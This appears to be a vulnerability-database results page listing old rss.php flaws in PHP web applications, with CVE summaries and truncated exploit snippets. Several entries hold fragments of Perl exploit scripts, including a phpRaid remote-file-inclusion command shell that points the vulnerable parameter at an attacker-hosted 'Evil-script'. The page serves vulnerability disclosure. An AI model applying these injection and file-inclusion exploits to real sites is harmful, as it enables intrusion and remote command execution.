Fuzzylime CMS 3.01 - Remote Command Execution

Fuzzylime CMS 3.01 - Remote Command Execution !/usr/bin/perl fuzzylime 3.0.1 Perl exploit discovered & written by Ams [email protected] DESCRIPTION: There are availability to load files through script rss.php, and also there are unfiltered extract; usage. This exploit creates shell in...

fuzzylime cms 3.01 Remote Command Execution Exploit

No description provided by source. !/usr/bin/perl fuzzylime 3.0.1 Perl exploit discovered & written by Ams [email protected] DESCRIPTION: There are availability to load files through script rss.php, and also there are unfiltered extract; usage. This exploit creates shell in...

Directory traversal

Multiple directory traversal vulnerabilities in OtomiGenX 2.2 allow remote attackers to include and execute arbitrary local files via a .. dot dot in the lang parameter to 1 libraryrss.php and 2 rss.php...

CVE-2008-2782

CVE-2008-2782 affects OtomiGenX 2.2. The vulnerability is a directory-traversal flaw in the PHP components library_rss.php and rss.php that allows remote attackers to include and execute arbitrary local files by supplying a .. (dot dot) in the lang parameter. This aligns with the NVD entry (CVSSv...

PT-2008-2120 · WordPress · Gallery

Name of the Vulnerable Software and Affected Versions: fGallery plugin for WordPress version 2.4.1 Description: The issue allows remote attackers to execute arbitrary SQL commands. This is achieved via the album parameter in the fim rss.php file. Recommendations: For version 2.4.1, consider...

CVE-2007-6666

SQL injection vulnerability in rss.php in Zenphoto 1.1 through 1.1.3 allows remote attackers to execute arbitrary SQL commands via the albumnr parameter...

Sql injection

SQL injection vulnerability in rss.php in Zenphoto 1.1 through 1.1.3 allows remote attackers to execute arbitrary SQL commands via the albumnr parameter...

Zenphoto 1.1.3 (rss.php albumnr) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl -w Zenphoto 1.1.3 SQL Injection Exploit Discovered by:...

PHPRaid RSS.PHP远程文件包含漏洞

!/usr/bin/perl phpraid cmd shell example: Exploit : http://www.example.com/phpRaidpath/rss.php?phpraiddir=Evil-script? use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2; if$Path!/http:/// || $Pathtocmd!/http:/// || !$cmdvusage head; while print "shell $"; while $cmd=$;...

phpraid-rfi.txt

!/usr/bin/perl phpraid cmd shell example: Exploit : http://www.example.com/phpRaidpath/rss.php?phpraiddir=Evil-script? use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2; if$Path!/http:/// || $Pathtocmd!/http:/// || !$cmdvusage head; while print "shell $"; while $cmd=$;...

phpRaid < 3.0.7 (rss.php phpraid_dir) Remote File Inclusion Exploit

Exploit for unknown platform in category web applications =================================================================== phpRaid cmd shell example: Exploit : http://www.example.com/phpRaidpath/rss.php?phpraiddir=Evil-script? use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv =...

Article Script &lt;= 1.6.3 (rss.php) Remote SQL Injection Vulnerability

No description provided by source. Article Script v1.and v1.6.3 Sql injection Script Name :Article Script Home Page:www.articlescript.org Bug Founder :Liz0ziM Mail:[email protected] Baba Kimdir? Tabiki Liz0ziM ------------------------------------------------------------...

Article Script 1.6.3 - rss.php SQL Injection

Article Script 1.6.3 - rss.php SQL Injection Article Script v1.and v1.6.3 Sql injection Script Name :Article Script Home Page:www.articlescript.org Bug Founder :Liz0ziM Mail:[email protected] Baba Kimdir? Tabiki Liz0ziM ------------------------------------------------------------...

Bloq 0.5.4 - rss.php?page[path] Remote File Inclusion

Bloq 0.5.4 - rss.php?pagepath Remote File Inclusion source: https://www.securityfocus.com/bid/20512/info Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to compromise the...

mospray.txt

Kurdish Security MoSpray Remote File Include Vulnerability Original Advisory : http://kurdishsecurity.blogspot.com/2006/07/kurdish-security-14-mospray-basedir.html Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : MoSpray Site :...

CVE-2006-3317

PHP remote file inclusion vulnerability in phpRaid 3.0.6 allows remote attackers to execute arbitrary code via a URL in the phpraiddir parameter to 1 announcements.php and 2 rss.php, a different set of vectors and affected versions than CVE-2006-3316 and CVE-2006-3116...

Sql injection

SQL injection vulnerability in rss.php in MyBB aka MyBulletinBoard 1.1.1 allows remote attackers to execute arbitrary SQL commands via the comma parameter. NOTE: it is not clear from the original report how this attack can succeed, since the demonstration URL uses a variable that is overwritten...

CVE-2006-1956

The CVE-2006-1956 vulnerability affects the com_rss option (rss.php) in Mambo and Joomla!, where an invalid feed parameter can cause an error message that reveals the server path, enabling information disclosure. The primary sources document the affected components and the impact as partial confi...

Sql injection

SQL injection vulnerability in rss.php in RedBLoG 0.5 allows remote attackers to execute arbitrary SQL commands via the catid parameter...

CVE-2006-1140

The CVE describes a SQL injection in RedBLoG 0.5’s rss.php, exploitable via the cat_id parameter to allow remote execution of arbitrary SQL commands. Affected software: RedBLoG 0.5; vulnerability cause: unsanitized input leading to SQL injection. Impact per NVD: Partial confidentiality/integrity/...